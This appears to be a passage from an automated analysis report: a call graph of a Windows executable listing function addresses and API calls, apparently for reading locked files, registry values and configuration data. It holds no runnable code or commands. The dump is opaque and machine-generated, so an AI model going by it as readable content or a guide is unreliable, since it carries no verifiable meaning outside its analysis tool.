38977->38978 39175 405361 38978->39175 38981 40c65c wcslen 39178 4053b6 39 API calls 38981->39178 38982 40c71d wcslen 38982->38546 38984 40c713 39181 4053df 39 API calls 38984->39181 38985 40c677 38985->38984 39179 40538b 39 API calls 38985->39179 38988 40c6a5 38988->38984 38989 40c6a9 memset 38988->38989 38990 40c6d3 38989->38990 39180 40c589 43 API calls 38990->39180 38992->38543 38994 40ae18 9 API calls 38993->38994 39000 40c210 38994->39000 38995 40ae51 9 API calls 38995->39000 38996 40c264 38997 40aebe FindClose 38996->38997 38999 40c26f 38997->38999 38998 40add4 2 API calls 38998->39000 39005 40e5ed memset memset 38999->39005 39000->38995 39000->38996 39000->38998 39001 40c231 _wcsicmp 39000->39001 39002 40c1d3 35 API calls 39000->39002 39001->39000 39003 40c248 39001->39003 39002->39000 39018 40c084 22 API calls 39003->39018 39006 414c2e 16 API calls 39005->39006 39007 40e63f 39006->39007 39008 409d1f 6 API calls 39007->39008 39009 40e658 39008->39009 39019 409b98 GetFileAttributesW 39009->39019 39011 40e667 39012 40e680 39011->39012 39014 409d1f 6 API calls 39011->39014 39020 409b98 GetFileAttributesW 39012->39020 39014->39012 39015 40e68f 39016 40c2d8 39015->39016 39021 40e4b2 39015->39021 39016->38928 39016->38929 39018->39000 39019->39011 39020->39015 39042 40e01e 39021->39042 39023 40e593 39025 40e5b0 39023->39025 39026 40e59c DeleteFileW 39023->39026 39024 40e521 39024->39023 39065 40e175 39024->39065 39027 40b04b ??3@YAXPAX 39025->39027 39026->39025 39028 40e5bb 39027->39028 39030 40e5c4 CloseHandle 39028->39030 39031 40e5cc 39028->39031 39030->39031 39033 40b633 ??3@YAXPAX 39031->39033 39032 40e573 39034 40e584 39032->39034 39035 40e57c FindCloseChangeNotification 39032->39035 39036 40e5db 39033->39036 39108 40b1ab ??3@YAXPAX ??3@YAXPAX 39034->39108 39035->39034 39039 40b633 ??3@YAXPAX 39036->39039 39038 40e540 39038->39032 39085 40e2ab 39038->39085 39040 40e5e3 39039->39040 39040->39016 39043 406214 22 API calls 39042->39043 39044 40e03c 39043->39044 39045 40e16b 39044->39045 39046 40dd85 74 API calls 39044->39046 39045->39024 39047 40e06b 39046->39047 39047->39045 39048 40afcf ??2@YAPAXI ??3@YAXPAX 39047->39048 39049 40e08d OpenProcess 39048->39049 39050 40e0a4 GetCurrentProcess DuplicateHandle 39049->39050 39054 40e152 39049->39054 39051 40e0d0 GetFileSize 39050->39051 39052 40e14a CloseHandle 39050->39052 39055 409a45 GetTempPathW GetWindowsDirectoryW GetTempFileNameW 39051->39055 39052->39054 39053 40e160 39057 40b04b ??3@YAXPAX 39053->39057 39054->39053 39056 406214 22 API calls 39054->39056 39058 40e0ea 39055->39058 39056->39053 39057->39045 39059 4096dc CreateFileW 39058->39059 39060 40e0f1 CreateFileMappingW 39059->39060 39061 40e140 CloseHandle CloseHandle 39060->39061 39062 40e10b MapViewOfFile 39060->39062 39061->39052 39063 40e13b FindCloseChangeNotification 39062->39063 39064 40e11f WriteFile UnmapViewOfFile 39062->39064 39063->39061 39064->39063 39066 40e18c 39065->39066 39067 406b90 11 API calls 39066->39067 39068 40e19f 39067->39068 39069 40e1a7 memset 39068->39069 39070 40e299 39068->39070 39075 40e1e8 39069->39075 39071 4069a3 ??3@YAXPAX ??3@YAXPAX 39070->39071 39072 40e2a4 39071->39072 39072->39038 39073 406e8f 13 API calls 39073->39075 39074 406b53 SetFilePointerEx ReadFile 39074->39075 39075->39073 39075->39074 39076 40e283 39075->39076 39077 40dd50 _wcsicmp 39075->39077 39081 40742e 8 API calls 39075->39081 39082 40aae3 wcslen wcslen _memicmp 39075->39082 39083 40e244 _snwprintf 39075->39083 39078 40e291 39076->39078 39079 40e288 ??3@YAXPAX 39076->39079 39077->39075 39080 40aa04 ??3@YAXPAX 39078->39080 39079->39078 39080->39070 39081->39075 39082->39075 39084 40a8d0 7 API calls 39083->39084 39084->39075 39086 40e2c2 39085->39086 39087 406b90 11 API calls 39086->39087 39098 40e2d3 39087->39098 39088 40e4a0 39089 4069a3 ??3@YAXPAX ??3@YAXPAX 39088->39089 39091 40e4ab 39089->39091 39090 406e8f 13 API calls 39090->39098 39091->39038 39092 406b53 SetFilePointerEx ReadFile 39092->39098 39093 40e489 39094 40aa04 ??3@YAXPAX 39093->39094 39095 40e491 39094->39095 39095->39088 39096 40e497 ??3@YAXPAX 39095->39096 39096->39088 39097 40dd50 _wcsicmp 39097->39098 39098->39088 39098->39090 39098->39092 39098->39093 39098->39097 39099 40dd50 _wcsicmp 39098->39099 39102 40742e 8 API calls 39098->39102 39103 40e3e0 memcpy 39098->39103 39104 40e3b3 wcschr 39098->39104 39105 40e3fb memcpy 39098->39105 39106 40e416 memcpy 39098->39106 39107 40e431 memcpy 39098->39107 39100 40e376 memset 39099->39100 39101 40aa29 6 API calls 39100->39101 39101->39098 39102->39098 39103->39098 39104->39098 39105->39098 39106->39098 39107->39098 39108->39023 39111 40a980 39109->39111 39110 40a8bb 39110->38948 39110->38949 39111->39110 39112 40a995 _wcsicmp 39111->39112 39113 40a99c wcscmp 39111->39113 39112->39111 39113->39111 39114->38952 39115->38956 39117 40aa23 RegEnumValueW 39116->39117 39117->38963 39117->38964 39119 405335 39118->39119 39120 40522a 39118->39120 39119->38546 39121 40b2cc 27 API calls 39120->39121 39122 405234 39121->39122 39123 40a804 8 API calls 39122->39123 39124 40523a 39123->39124 39163 40b273 39124->39163 39126 405248 _mbscpy _mbscat GetProcAddress 39127 40b273 27 API calls 39126->39127 39128 405279 39127->39128 39166 405211 GetProcAddress 39128->39166 39130 405282 39131 40b273 27 API calls 39130->39131 39132 40528f 39131->39132 39167 405211 GetProcAddress 39132->39167 39134 405298 39135 40b273 27 API calls 39134->39135 39136 4052a5 39135->39136 39168 405211 GetProcAddress 39136->39168 39138 4052ae 39139 40b273 27 API calls 39138->39139 39140 4052bb 39139->39140 39169 405211 GetProcAddress 39140->39169 39142 4052c4 39143 40b273 27 API calls 39142->39143 39144 4052d1 39143->39144 39170 405211 GetProcAddress 39144->39170 39146 4052da 39147 40b273 27 API calls 39146->39147 39148 4052e7 39147->39148 39171 405211 GetProcAddress 39148->39171 39150 4052f0 39151 40b273 27 API calls 39150->39151 39152 4052fd 39151->39152 39172 405211 GetProcAddress 39152->39172 39154 405306 39155 40b273 27 API calls 39154->39155 39156 405313 39155->39156 39173 405211 GetProcAddress 39156->39173 39158 40531c 39159 40b273 27 API calls 39158->39159 39160 405329 39159->39160 39174 405211 GetProcAddress 39160->39174 39162 405332 39162->39119 39164 40b58d 27 API calls 39163->39164 39165 40b18c 39164->39165 39165->39126 39166->39130 39167->39134 39168->39138 39169->39142 39170->39146 39171->39150 39172->39154 39173->39158 39174->39162 39176 405220 39 API calls 39175->39176 39177 405369 39176->39177 39177->38981 39177->38982 39178->38985 39179->38988 39180->38984 39181->38982 39183 40440c FreeLibrary 39182->39183 39184 40436d 39183->39184 39185 40a804 8 API calls 39184->39185 39186 404377 39185->39186 39187 404383 39186->39187 39188 404405 39186->39188 39189 40b273 27 API calls 39187->39189 39188->38555 39188->38557 39188->38558 39190 40438d GetProcAddress 39189->39190 39191 40b273 27 API calls 39190->39191 39192 4043a7 GetProcAddress 39191->39192 39193 40b273 27 API calls 39192->39193 39194 4043ba GetProcAddress 39193->39194 39195 40b273 27 API calls 39194->39195 39196 4043ce GetProcAddress 39195->39196 39197 40b273 27 API calls 39196->39197 39198 4043e2 GetProcAddress 39197->39198 39199 4043f1 39198->39199 39200 4043f7 39199->39200 39201 40440c FreeLibrary 39199->39201 39200->39188 39201->39188 39203 404413 FreeLibrary 39202->39203 39204 40441e 39202->39204 39203->39204 39204->38572 39205->38563 39207 40442e 39206->39207 39208 40447e 39206->39208 39209 40b2cc 27 API calls 39207->39209 39208->38563 39210 404438 39209->39210 39211 40a804 8 API calls 39210->39211 39212 40443e 39211->39212 39213 404445 39212->39213 39214 404467 39212->39214 39215 40b273 27 API calls 39213->39215 39214->39208 39216 404475 FreeLibrary 39214->39216 39217 40444f GetProcAddress 39215->39217 39216->39208 39217->39214 39218 404460 39217->39218 39218->39214 39220 4135f6 39219->39220 39221 4135eb FreeLibrary 39219->39221 39220->38575 39221->39220 39223 4449c4 39222->39223 39224 444a52 39222->39224 39225 40b2cc 27 API calls 39223->39225 39224->38592 39224->38593 39226 4449cb 39225->39226 39227 40a804 8 API calls 39226->39227 39228 4449d1 39227->39228 39229 40b273 27 API calls 39228->39229 39230 4449dc GetProcAddress 39229->39230 39231 40b273 27 API calls 39230->39231 39232 4449f3 GetProcAddress 39231->39232 39233 40b273 27 API calls 39232->39233 39234 444a04 GetProcAddress 39233->39234 39235 40b273 27 API calls 39234->39235 39236 444a15 GetProcAddress 39235->39236 39237 40b273 27 API calls 39236->39237 39238 444a26 GetProcAddress 39237->39238 39239 40b273 27 API calls 39238->39239 39240 444a37 GetProcAddress 39239->39240 39241 40b273 27 API calls 39240->39241 39242 444a48 GetProcAddress 39241->39242 39242->39224 39243->38603 39244->38603 39245->38603 39246->38603 39247->38594 39249 403a29 39248->39249 39263 403bed memset memset 39249->39263 39251 403ae7 39276 40b1ab ??3@YAXPAX ??3@YAXPAX 39251->39276 39252 403a3f memset 39258 403a2f 39252->39258 39254 403aef 39254->38611 39255 409b98 GetFileAttributesW 39255->39258 39256 40a8d0 7 API calls 39256->39258 39257 409d1f 6 API calls 39257->39258 39258->39251 39258->39252 39258->39255 39258->39256 39258->39257 39260 40a051 GetFileTime FindCloseChangeNotification 39259->39260 39261 4039ca CompareFileTime 39259->39261 39260->39261 39261->38611 39262->38610 39264 414c2e 16 API calls 39263->39264 39265 403c38 39264->39265 39266 409719 2 API calls 39265->39266 39267 403c3f wcscat 39266->39267 39268 414c2e 16 API calls 39267->39268 39269 403c61 39268->39269 39270 409719 2 API calls 39269->39270 39271 403c68 wcscat 39270->39271 39277 403af5 39271->39277 39274 403af5 20 API calls 39275 403c95 39274->39275 39275->39258 39276->39254 39278 403b02 39277->39278 39279 40ae18 9 API calls 39278->39279 39287 403b37 39279->39287 39280 403bdb 39282 40aebe FindClose 39280->39282 39281 40add4 wcscmp wcscmp 39281->39287 39283 403be6 39282->39283 39283->39274 39284 40ae18 9 API calls 39284->39287 39285 40ae51 9 API calls 39285->39287 39286 40aebe FindClose 39286->39287 39287->39280 39287->39281 39287->39284 39287->39285 39287->39286 39288 40a8d0 7 API calls 39287->39288 39288->39287 39290 409d1f 6 API calls 39289->39290 39291 404190 39290->39291 39304 409b98 GetFileAttributesW 39291->39304 39293 40419c 39294 4041a7 6 API calls 39293->39294 39295 40435c 39293->39295 39297 40424f 39294->39297 39295->38637 39297->39295 39298 40425e memset 39297->39298 39300 409d1f 6 API calls 39297->39300 39301 40a8ab 9 API calls 39297->39301 39305 414842 39297->39305 39298->39297 39299 404296 wcscpy 39298->39299 39299->39297 39300->39297 39302 4042b6 memset memset _snwprintf wcscpy 39301->39302 39302->39297 39303->38635 39304->39293 39308 41443e 39305->39308 39307 414866 39307->39297 39309 41444b 39308->39309 39310 414451 39309->39310 39311 4144a3 GetPrivateProfileStringW 39309->39311 39312 414491 39310->39312 39313 414455 wcschr 39310->39313 39311->39307 39314 414495 WritePrivateProfileStringW 39312->39314 39313->39312 39315 414463 _snwprintf 39313->39315 39314->39307 39315->39314 39316->38641 39318 40b2cc 27 API calls 39317->39318 39319 409615 39318->39319 39320 409d1f 6 API calls 39319->39320 39321 409625 39320->39321 39346 409b98 GetFileAttributesW 39321->39346 39323 409634 39324 409648 39323->39324 39347 4091b8 memset 39323->39347 39326 40b2cc 27 API calls 39324->39326 39328 408801 39324->39328 39327 40965d 39326->39327 39329 409d1f 6 API calls 39327->39329 39328->38644 39328->38645 39330 40966d 39329->39330 39399 409b98 GetFileAttributesW 39330->39399 39332 40967c 39332->39328 39333 409681 39332->39333 39400 409529 72 API calls 39333->39400 39335 409690 39335->39328 39336->38667 39337->38644 39338->38672 39339->38644 39346->39323 39401 40a6e6 WideCharToMultiByte 39347->39401 39349 409202 39402 444432 39349->39402 39352 40b273 27 API calls 39353 409236 39352->39353 39448 438552 39353->39448 39356 409383 39358 40b273 27 API calls 39356->39358 39360 409399 39358->39360 39359 409254 39361 40937b 39359->39361 39469 4253cf 17 API calls 39359->39469 39362 438552 134 API calls 39360->39362 39473 424f26 123 API calls 39361->39473 39380 4093a3 39362->39380 39366 4094ff 39477 443d90 39366->39477 39369 4251c4 137 API calls 39369->39380 39371 409507 39379 40951d 39371->39379 39497 408f2f 77 API calls 39371->39497 39373 4093df 39476 424f26 123 API calls 39373->39476 39377 4253cf 17 API calls 39377->39380 39379->39324 39380->39366 39380->39369 39380->39373 39380->39377 39382 4093e4 39380->39382 39474 4253af 17 API calls 39382->39474 39389 4093ed 39475 4253af 17 API calls 39389->39475 39392 4093f9 39392->39373 39393 409409 memcmp 39392->39393 39393->39373 39394 409421 memcmp 39393->39394 39399->39332 39400->39335 39401->39349 39498 4438b5 39402->39498 39404 44444c 39410 409215 39404->39410 39512 415a6d 39404->39512 39406 4442e6 11 API calls 39408 44469e 39406->39408 39407 444486 39409 4444b9 memcpy 39407->39409 39447 4444a4 39407->39447 39408->39410 39412 443d90 111 API calls 39408->39412 39516 415258 39409->39516 39410->39352 39410->39379 39412->39410 39413 444524 39414 444541 39413->39414 39415 44452a 39413->39415 39519 444316 39414->39519 39416 416935 16 API calls 39415->39416 39416->39447 39419 444316 18 API calls 39420 444563 39419->39420 39421 444316 18 API calls 39420->39421 39422 44456f 39421->39422 39423 444316 18 API calls 39422->39423 39424 44457f 39423->39424 39424->39447 39533 432d4e 39424->39533 39447->39406 39586 438460 39448->39586 39450 409240 39450->39356 39451 4251c4 39450->39451 39598 424f07 39451->39598 39453 4251e4 39454 4251f7 39453->39454 39455 4251e8 39453->39455 39606 4250f8 39454->39606 39605 4446ea 11 API calls 39455->39605 39457 4251f2 39457->39359 39459 425209 39462 425249 39459->39462 39465 4250f8 127 API calls 39459->39465 39466 425287 39459->39466 39614 4384e9 135 API calls 39459->39614 39615 424f74 124 API calls 39459->39615 39462->39466 39465->39459 39473->39356 39474->39389 39475->39392 39476->39366 39478 443da3 39477->39478 39479 443db6 39477->39479 39622 41707a 11 API calls 39478->39622 39479->39371 39481 443da8 39482 443dbc 39481->39482 39483 443dac 39481->39483 39624 4300e8 memset memset memcpy 39482->39624 39623 4446ea 11 API calls 39483->39623 39497->39379 39499 4438d0 39498->39499 39510 4438c9 39498->39510 39500 415378 memcpy memcpy 39499->39500 39501 4438d5 39500->39501 39502 4154e2 10 API calls 39501->39502 39503 443906 39501->39503 39501->39510 39502->39503 39504 443970 memset 39503->39504 39503->39510 39507 44398b 39504->39507 39505 4439a0 39506 415700 10 API calls 39505->39506 39505->39510 39508 4439c0 39506->39508 39507->39505 39509 41975c 10 API calls 39507->39509 39508->39510 39511 418981 10 API calls 39508->39511 39509->39505 39510->39404 39511->39510 39513 415a77 39512->39513 39514 415a8d 39513->39514 39515 415a7e memset 39513->39515 39514->39407 39515->39514 39517 4438b5 11 API calls 39516->39517 39518 41525d 39517->39518 39518->39413 39520 444328 39519->39520 39521 444423 39520->39521 39522 44434e 39520->39522 39523 4446ea 11 API calls 39521->39523 39524 432d4e memset memset memcpy 39522->39524 39530 444381 39523->39530 39525 44435a 39524->39525 39527 444375 39525->39527 39532 44438b 39525->39532 39526 432d4e memset memset memcpy 39528 4443ec 39526->39528 39529 416935 16 API calls 39527->39529 39528->39530 39531 416935 16 API calls 39528->39531 39529->39530 39530->39419 39531->39530 39532->39526 39534 432d65 39533->39534 39587 41703f 11 API calls 39586->39587 39588 43847a 39587->39588 39589 43848a 39588->39589 39590 43847e 39588->39590 39592 438270 134 API calls 39589->39592 39591 4446ea 11 API calls 39590->39591 39594 438488 39591->39594 39593 4384aa 39592->39593 39593->39594 39595 424f26 123 API calls 39593->39595 39594->39450 39596 4384bb 39595->39596 39597 438270 134 API calls 39596->39597 39597->39594 39599 424f1f 39598->39599 39600 424f0c 39598->39600 39602 424eea 11 API calls 39599->39602 39601 416760 11 API calls 39600->39601 39603 424f18 39601->39603 39604 424f24 39602->39604 39603->39453 39604->39453 39605->39457 39607 425108 39606->39607 39613 42510d 39606->39613 39608 424f74 124 API calls 39607->39608 39608->39613 39609 42569b 125 API calls 39610 42516e 39609->39610 39612 415c7d 16 API calls 39610->39612 39611 425115 39611->39459 39612->39611 39613->39609 39613->39611 39614->39459 39615->39459 39622->39481 39623->39479 39655 413f4f 39628->39655 39631 413f37 K32GetModuleFileNameExW 39632 413f4a 39631->39632 39632->38703 39634 413969 wcscpy 39633->39634 39635 41396c wcschr 39633->39635 39647 413a3a 39634->39647 39635->39634 39637 41398e 39635->39637 39660 4097f7 wcslen wcslen _memicmp 39637->39660 39639 41399a 39640 4139a4 memset 39639->39640 39641 4139e6 39639->39641 39661 409dd5 GetWindowsDirectoryW wcscpy 39640->39661 39643 413a31 wcscpy 39641->39643 39644 4139ec memset 39641->39644 39643->39647 39662 409dd5 GetWindowsDirectoryW wcscpy 39644->39662 39645 4139c9 wcscpy wcscat 39645->39647 39647->38703 39648 413a11 memcpy wcscat 39648->39647 39650 413cb0 GetModuleHandleW 39649->39650 39651 413cda 39649->39651 39650->39651 39652 413cbf GetProcAddress 39650->39652 39653 413ce3 GetProcessTimes 39651->39653 39654 413cf6 39651->39654 39652->39651 39653->38706 39654->38706 39656 413f2f 39655->39656 39657 413f54 39655->39657 39656->39631 39656->39632 39658 40a804 8 API calls 39657->39658 39659 413f5f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 39658->39659 39659->39656 39660->39639 39661->39645 39662->39648 39663->38727 39664->38750 39666 409cf9 GetVersionExW 39665->39666 39667 409d0a 39665->39667 39666->39667 39667->38756 39667->38760 39668->38762 39669->38765 39670->38767 39671->38832 39673 40bba5 39672->39673 39720 40cc26 39673->39720 39676 40bd4b 39741 40cc0c 39676->39741 39681 40b2cc 27 API calls 39682 40bbef 39681->39682 39748 40ccf0 _wcsicmp 39682->39748 39684 40bbf5 39684->39676 39749 40ccb4 6 API calls 39684->39749 39686 40bc26 39687 40cf04 17 API calls 39686->39687 39688 40bc2e 39687->39688 39689 40bd43 39688->39689 39690 40b2cc 27 API calls 39688->39690 39691 40cc0c 4 API calls 39689->39691 39692 40bc40 39690->39692 39691->39676 39750 40ccf0 _wcsicmp 39692->39750 39694 40bc46 39694->39689 39695 40bc61 memset memset WideCharToMultiByte 39694->39695 39751 40103c strlen 39695->39751 39697 40bcc0 39698 40b273 27 API calls 39697->39698 39699 40bcd0 memcmp 39698->39699 39699->39689 39700 40bce2 39699->39700 39701 404423 37 API calls 39700->39701 39702 40bd10 39701->39702 39702->39689 39703 40bd3a LocalFree 39702->39703 39704 40bd1f memcpy 39702->39704 39703->39689 39704->39703 39705->38847 39707 409a74 GetTempFileNameW 39706->39707 39708 409a66 GetWindowsDirectoryW 39706->39708 39707->38846 39708->39707 39709->38884 39710->38884 39711->38884 39712->38884 39713->38884 39714->38884 39715->38884 39716->38884 39717->38884 39718->38859 39719->38881 39752 4096c3 CreateFileW 39720->39752 39722 40cc34 39723 40cc3d GetFileSize 39722->39723 39731 40bbca 39722->39731 39724 40afcf 2 API calls 39723->39724 39725 40cc64 39724->39725 39753 40a2ef ReadFile 39725->39753 39727 40cc71 39754 40ab4a MultiByteToWideChar 39727->39754 39729 40cc95 FindCloseChangeNotification 39730 40b04b ??3@YAXPAX 39729->39730 39730->39731 39731->39676 39732 40cf04 39731->39732 39733 40b633 ??3@YAXPAX 39732->39733 39734 40cf14 39733->39734 39760 40b1ab ??3@YAXPAX ??3@YAXPAX 39734->39760 39736 40bbdd 39736->39676 39736->39681 39737 40cf1b 39737->39736 39739 40cfef 39737->39739 39761 40cd4b 39737->39761 39740 40cd4b 14 API calls 39739->39740 39740->39736 39742 40b633 ??3@YAXPAX 39741->39742 39743 40cc15 39742->39743 39744 40aa04 ??3@YAXPAX 39743->39744 39745 40cc1d 39744->39745 39805 40b1ab ??3@YAXPAX ??3@YAXPAX 39745->39805 39747 40b7d4 memset CreateFileW 39747->38839 39747->38840 39748->39684 39749->39686 39750->39694 39751->39697 39752->39722 39753->39727 39755 40ab93 39754->39755 39756 40ab6b 39754->39756 39755->39729 39757 40a9ce 4 API calls 39756->39757 39758 40ab74 39757->39758 39759 40ab7c MultiByteToWideChar 39758->39759 39759->39755 39760->39737 39762 40cd7b 39761->39762 39795 40aa29 6 API calls 39762->39795 39764 40cef5 39765 40aa04 ??3@YAXPAX 39764->39765 39766 40cefd 39765->39766 39766->39737 39767 40cd89 39767->39764 39796 40aa29 6 API calls 39767->39796 39769 40ce1d 39797 40aa29 6 API calls 39769->39797 39771 40ce3e 39772 40ce6a 39771->39772 39798 40abb7 wcslen memmove 39771->39798 39773 40ce9f 39772->39773 39801 40abb7 wcslen memmove 39772->39801 39775 40a8d0 7 API calls 39773->39775 39778 40ceb5 39775->39778 39776 40ce56 39799 40aa71 wcslen 39776->39799 39785 40a8d0 7 API calls 39778->39785 39780 40ce8b 39802 40aa71 wcslen 39780->39802 39782 40ce5e 39800 40abb7 wcslen memmove 39782->39800 39783 40ce93 39803 40abb7 wcslen memmove 39783->39803 39787 40cecb 39785->39787 39804 40d00b malloc memcpy ??3@YAXPAX ??3@YAXPAX 39787->39804 39789 40cedd 39790 40aa04 ??3@YAXPAX 39789->39790 39791 40cee5 39790->39791 39792 40aa04 ??3@YAXPAX 39791->39792 39793 40ceed 39792->39793 39794 40aa04 ??3@YAXPAX 39793->39794 39794->39764 39795->39767 39796->39769 39797->39771 39798->39776 39799->39782 39800->39772 39801->39780 39802->39783 39803->39773 39804->39789 39805->39747 39806->38899 39807->38907 37668 44dea5 37669 44deb5 FreeLibrary 37668->37669 37670 44dec3 37668->37670 37669->37670 39817 4148b6 FindResourceW 39818 4148cf SizeofResource 39817->39818 39821 4148f9 39817->39821 39819 4148e0 LoadResource 39818->39819 39818->39821 39820 4148ee LockResource 39819->39820 39819->39821 39820->39821 37847 415304 ??3@YAXPAX 39822 441b3f 39832 43a9f6 39822->39832 39824 441b61 40005 4386af memset 39824->40005 39826 44189a 39827 4418e2 39826->39827 39831 442bd4 39826->39831 39828 4418ea 39827->39828 40006 4414a9 12 API calls 39827->40006 39831->39828 40007 441409 memset 39831->40007 39833 43aa20 39832->39833 39834 43aadf 39832->39834 39833->39834 39835 43aa34 memset 39833->39835 39834->39824 39836 43aa56 39835->39836 39837 43aa4d 39835->39837 40008 43a6e7 39836->40008 40016 42c02e memset 39837->40016 39842 43aad3 40018 4169a7 11 API calls 39842->40018 39843 43aaae 39843->39834 39843->39842 39858 43aae5 39843->39858 39844 43ac18 39847 43ac47 39844->39847 40020 42bbd5 memcpy memcpy memcpy memset memcpy 39844->40020 39848 43aca8 39847->39848 40021 438eed 16 API calls 39847->40021 39852 43acd5 39848->39852 40023 4233ae 11 API calls 39848->40023 39851 43ac87 40022 4233c5 16 API calls 39851->40022 40024 423426 11 API calls 39852->40024 39856 43ace1 40025 439811 163 API calls 39856->40025 39857 43a9f6 161 API calls 39857->39858 39858->39834 39858->39844 39858->39857 40019 439bbb 22 API calls 39858->40019 39860 43acfd 39865 43ad2c 39860->39865 40026 438eed 16 API calls 39860->40026 39862 43ad19 40027 4233c5 16 API calls 39862->40027 39864 43ad58 40028 44081d 163 API calls 39864->40028 39865->39864 39868 43add9 39865->39868 40032 423426 11 API calls 39868->40032 39869 43ae3a memset 39870 43ae73 39869->39870 40033 42e1c0 147 API calls 39870->40033 39871 43adab 40030 438c4e 163 API calls 39871->40030 39872 43ad6c 39872->39834 39872->39871 40029 42370b memset memcpy memset 39872->40029 39876 43adcc 40031 440f84 12 API calls 39876->40031 39877 43ae96 40034 42e1c0 147 API calls 39877->40034 39880 43aea8 39881 43aec1 39880->39881 40035 42e199 147 API calls 39880->40035 39882 43af00 39881->39882 40036 42e1c0 147 API calls 39881->40036 39882->39834 39886 43af1a 39882->39886 39887 43b3d9 39882->39887 40037 438eed 16 API calls 39886->40037 39892 43b3f6 39887->39892 39896 43b4c8 39887->39896 39888 43b60f 39888->39834 40096 4393a5 17 API calls 39888->40096 39891 43af2f 40038 4233c5 16 API calls 39891->40038 40078 432878 12 API calls 39892->40078 39894 43af51 40039 423426 11 API calls 39894->40039 39902 43b4f2 39896->39902 40084 42bbd5 memcpy memcpy memcpy memset memcpy 39896->40084 39898 43af7d 40040 423426 11 API calls 39898->40040 40085 43a76c 21 API calls 39902->40085 39903 43b529 40086 44081d 163 API calls 39903->40086 39904 43b462 40080 423330 11 API calls 39904->40080 39905 43af94 40041 423330 11 API calls 39905->40041 39909 43afca 40042 423330 11 API calls 39909->40042 39910 43b47e 39914 43b497 39910->39914 40081 42374a memcpy memset memcpy memcpy memcpy 39910->40081 39911 43b544 39915 43b55c 39911->39915 40087 42c02e memset 39911->40087 39912 43b428 39912->39904 40079 432b60 16 API calls 39912->40079 40082 4233ae 11 API calls 39914->40082 40088 43a87a 163 API calls 39915->40088 39917 43afdb 40043 4233ae 11 API calls 39917->40043 39922 43b56c 39926 43b58a 39922->39926 40089 423330 11 API calls 39922->40089 39923 43b4b1 40083 423399 11 API calls 39923->40083 39925 43afee 40044 44081d 163 API calls 39925->40044 40090 440f84 12 API calls 39926->40090 39927 43b4c1 40092 42db80 163 API calls 39927->40092 39932 43b592 40091 43a82f 16 API calls 39932->40091 39935 43b5b4 40093 438c4e 163 API calls 39935->40093 39937 43b5cf 40094 42c02e memset 39937->40094 39939 43b005 39939->39834 39943 43b01f 39939->39943 40045 42d836 163 API calls 39939->40045 39940 43b1ef 40055 4233c5 16 API calls 39940->40055 39943->39940 40053 423330 11 API calls 39943->40053 40054 42d71d 163 API calls 39943->40054 39944 43b212 40056 423330 11 API calls 39944->40056 39946 43b087 40046 4233ae 11 API calls 39946->40046 39947 43add4 39947->39888 40095 438f86 16 API calls 39947->40095 39950 43b22a 40057 42ccb5 11 API calls 39950->40057 39953 43b23f 40058 4233ae 11 API calls 39953->40058 39954 43b10f 40049 423330 11 API calls 39954->40049 39956 43b257 40059 4233ae 11 API calls 39956->40059 39960 43b129 40050 4233ae 11 API calls 39960->40050 39961 43b26e 40060 4233ae 11 API calls 39961->40060 39964 43b09a 39964->39954 40047 42cc15 19 API calls 39964->40047 40048 4233ae 11 API calls 39964->40048 39965 43b282 40061 43a87a 163 API calls 39965->40061 39967 43b13c 40051 440f84 12 API calls 39967->40051 39969 43b29d 40062 423330 11 API calls 39969->40062 39972 43b15f 40052 4233ae 11 API calls 39972->40052 39973 43b2af 39974 43b2b8 39973->39974 39975 43b2ce 39973->39975 40063 4233ae 11 API calls 39974->40063 40064 440f84 12 API calls 39975->40064 39979 43b2c9 40066 4233ae 11 API calls 39979->40066 39980 43b2da 40065 42370b memset memcpy memset 39980->40065 39983 43b2f9 40067 423330 11 API calls 39983->40067 39985 43b30b 40068 423330 11 API calls 39985->40068 39987 43b325 40069 423399 11 API calls 39987->40069 39989 43b332 40070 4233ae 11 API calls 39989->40070 39991 43b354 40071 423399 11 API calls 39991->40071 39993 43b364 40072 43a82f 16 API calls 39993->40072 39995 43b370 40073 42db80 163 API calls 39995->40073 39997 43b380 40074 438c4e 163 API calls 39997->40074 39999 43b39e 40075 423399 11 API calls 39999->40075 40001 43b3ae 40076 43a76c 21 API calls 40001->40076 40003 43b3c3 40077 423399 11 API calls 40003->40077 40005->39826 40006->39828 40007->39831 40009 43a6f5 40008->40009 40010 43a765 40008->40010 40009->40010 40097 42a115 40009->40097 40010->39834 40017 4397fd memset 40010->40017 40014 43a73d 40014->40010 40015 42a115 147 API calls 40014->40015 40015->40010 40016->39836 40017->39843 40018->39834 40019->39858 40020->39847 40021->39851 40022->39848 40023->39852 40024->39856 40025->39860 40026->39862 40027->39865 40028->39872 40029->39871 40030->39876 40031->39947 40032->39869 40033->39877 40034->39880 40035->39881 40036->39881 40037->39891 40038->39894 40039->39898 40040->39905 40041->39909 40042->39917 40043->39925 40044->39939 40045->39946 40046->39964 40047->39964 40048->39964 40049->39960 40050->39967 40051->39972 40052->39943 40053->39943 40054->39943 40055->39944 40056->39950 40057->39953 40058->39956 40059->39961 40060->39965 40061->39969 40062->39973 40063->39979 40064->39980 40065->39979 40066->39983 40067->39985 40068->39987 40069->39989 40070->39991 40071->39993 40072->39995 40073->39997 40074->39999 40075->40001 40076->40003 40077->39947 40078->39912 40079->39904 40080->39910 40081->39914 40082->39923 40083->39927 40084->39902 40085->39903 40086->39911 40087->39915 40088->39922 40089->39926 40090->39932 40091->39927 40092->39935 40093->39937 40094->39947 40095->39888 40096->39834 40098 42a175 40097->40098 40100 42a122 40097->40100 40098->40010 40103 42b13b 147 API calls 40098->40103 40100->40098 40101 42a115 147 API calls 40100->40101 40104 43a174 40100->40104 40128 42a0a8 147 API calls 40100->40128 40101->40100 40103->40014 40118 43a196 40104->40118 40119 43a19e 40104->40119 40105 43a306 40105->40118 40148 4388c4 14 API calls 40105->40148 40108 42a115 147 API calls 40108->40119 40110 43a642 40110->40118 40152 4169a7 11 API calls 40110->40152 40114 43a635 40151 42c02e memset 40114->40151 40118->40100 40119->40105 40119->40108 40119->40118 40129 42ff8c 40119->40129 40137 415a91 40119->40137 40141 4165ff 40119->40141 40144 439504 13 API calls 40119->40144 40145 4312d0 147 API calls 40119->40145 40146 42be4c memcpy memcpy memcpy memset memcpy 40119->40146 40147 43a121 11 API calls 40119->40147 40121 4169a7 11 API calls 40122 43a325 40121->40122 40122->40110 40122->40114 40122->40118 40122->40121 40123 42b5b5 memset memcpy 40122->40123 40124 42bf4c 14 API calls 40122->40124 40127 4165ff 11 API calls 40122->40127 40149 42b63e 14 API calls 40122->40149 40150 